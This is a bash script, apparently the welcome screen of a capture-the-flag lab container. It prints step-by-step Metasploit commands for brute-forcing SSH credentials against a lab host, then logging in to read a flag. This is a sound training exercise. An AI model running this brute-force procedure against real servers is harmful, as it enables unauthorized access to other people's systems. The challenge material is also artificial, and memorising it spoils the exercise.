#!/bin/bash

echo "====================================================================="
echo "                SSH BRUTE FORCE CHALLENGE                            "
echo "====================================================================="
echo ""
echo "Welcome to the SSH Brute Force Challenge!"
echo ""
echo "In this challenge, your goal is to use Metasploit to perform a"
echo "brute force attack against an SSH server to discover valid credentials."
echo "Once you have the credentials, you'll log in and find the flag."
echo ""
echo "TARGET: SSH server running at ${DEFENSE_CONTAINER_HOST:-localhost}:22"
echo ""

# Check user and directory permissions
echo "System Information:"
echo " - User: $(whoami)"
echo " - Home directory: $HOME"
echo " - Working directory: $(pwd)"
echo ""

echo "INSTRUCTIONS:"
echo ""
echo "1. Start Metasploit Framework Console:"
echo "   $ msfconsole"
echo ""
echo "2. Use the SSH login scanner module:"
echo "   msf> use auxiliary/scanner/ssh/ssh_login"
echo ""
echo "3. Set the required options:"
echo "   msf> set RHOSTS ${DEFENSE_CONTAINER_HOST:-localhost}"
echo "   msf> set RPORT 22"
echo "   msf> set USERNAME target"
echo "   msf> set PASS_FILE /home/kali/challenge/passwords.txt"
echo "   msf> set VERBOSE true"
echo "   msf> set STOP_ON_SUCCESS true"
echo ""
echo "4. Launch the attack:"
echo "   msf> exploit"
echo ""
echo "5. Once you have valid credentials, connect to the target:"
echo "   $ ssh target@${DEFENSE_CONTAINER_HOST:-localhost}"
echo ""
echo "6. Find and read the flag on the target system."
echo ""
echo "HELPFUL TIPS:"
echo " - Use 'show options' to verify all required settings"
echo " - The password list is in /home/kali/challenge/passwords.txt"
echo " - If you need more help, check /home/kali/challenge/hint.txt"
echo ""
echo "====================================================================="
echo ""

# Keep container running
sleep infinity 